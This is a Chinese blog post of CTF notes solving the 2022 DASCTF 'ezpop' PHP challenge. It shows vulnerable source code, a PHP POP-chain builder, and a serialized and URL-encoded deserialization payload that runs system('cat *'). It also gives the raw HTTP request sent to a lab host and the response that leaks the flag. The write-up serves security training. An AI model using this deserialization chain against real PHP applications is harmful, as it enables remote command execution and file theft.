CTF做题笔记8

最新推荐文章于 2025-11-07 18:02:27 发布

原创最新推荐文章于 2025-11-07 18:02:27 发布 · 860 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全 #web安全 #python

笔记专栏收录该内容

45 篇文章

订阅专栏

[2022DASCTF]ezpop

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}


$a = new fin();
$a->f1 = new what();
$a->f1->a = new mix();
$a->f1->a->m1 = new crow();
$a->f1->a->m1->v1 = new fin();
$a->f1->a->m1->v1->f1 = new mix();
// $a->f1->a->m1->v1->f1 ->m1 = "\n print_r(scandir(dirname(__FILE__)));";
$a->f1->a->m1->v1->f1->m1 = "\n system('cat *');";
echo serialize($a);
?>

O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"mix":1:{s:2:"m1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:18:"
 system('cat *');";}}s:2:"v2";N;}}}}

%4f%3a%33%3a%22%66%69%6e%22%3a%31%3a%7b%73%3a%32%3a%22%66%31%22%3b%4f%3a%34%3a%22%77%68%61%74%22%3a%31%3a%7b%73%3a%31%3a%22%61%22%3b%4f%3a%33%3a%22%6d%69%78%22%3a%31%3a%7b%73%3a%32%3a%22%6d%31%22%3b%4f%3a%34%3a%22%63%72%6f%77%22%3a%32%3a%7b%73%3a%32%3a%22%76%31%22%3b%4f%3a%33%3a%22%66%69%6e%22%3a%31%3a%7b%73%3a%32%3a%22%66%31%22%3b%4f%3a%33%3a%22%6d%69%78%22%3a%31%3a%7b%73%3a%32%3a%22%6d%31%22%3b%73%3a%31%38%3a%22%0a%20%73%79%73%74%65%6d%28%27%63%61%74%20%2a%27%29%3b%22%3b%7d%7d%73%3a%32%3a%22%76%32%22%3b%4e%3b%7d%7d%7d%7d%0a

POST / HTTP/1.1
Host: d2a67562-b05a-4c09-a308-a7b7e9fb4bdc.node4.buuoj.cn:81
Content-Length: 535
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://d2a67562-b05a-4c09-a308-a7b7e9fb4bdc.node4.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://d2a67562-b05a-4c09-a308-a7b7e9fb4bdc.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=17fbfc9d0df1596-08ef2a13d1d96a-14281e05-384000-17fbfc9d0e014a0
Connection: close

cmd=%4f%3a%33%3a%22%66%69%6e%22%3a%31%3a%7b%73%3a%32%3a%22%66%31%22%3b%4f%3a%34%3a%22%77%68%61%74%22%3a%31%3a%7b%73%3a%31%3a%22%61%22%3b%4f%3a%33%3a%22%6d%69%78%22%3a%31%3a%7b%73%3a%32%3a%22%6d%31%22%3b%4f%3a%34%3a%22%63%72%6f%77%22%3a%32%3a%7b%73%3a%32%3a%22%76%31%22%3b%4f%3a%33%3a%22%66%69%6e%22%3a%31%3a%7b%73%3a%32%3a%22%66%31%22%3b%4f%3a%33%3a%22%6d%69%78%22%3a%31%3a%7b%73%3a%32%3a%22%6d%31%22%3b%73%3a%31%38%3a%22%0a%20%73%79%73%74%65%6d%28%27%63%61%74%20%2a%27%29%3b%22%3b%7d%7d%73%3a%32%3a%22%76%32%22%3b%4e%3b%7d%7d%7d%7d%0a

HTTP/1.1 200 OK
Server: openresty
Date: Sun, 27 Mar 2022 06:10:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.28
Content-Length: 1424

not here, but it's close, think more.not here, but it's close, think more.not here, but it's close, think more.not here, but it's close, think more.not here, but it's close, think more.congratulations!
<?php

//flag{5ea0ff6e-3160-49f4-9a92-a5137e51db3d}
not here, but it's close, think more.not here, but it's close, think more.not here, but it's close, think more.not here, but you are almost getting the flag!<?php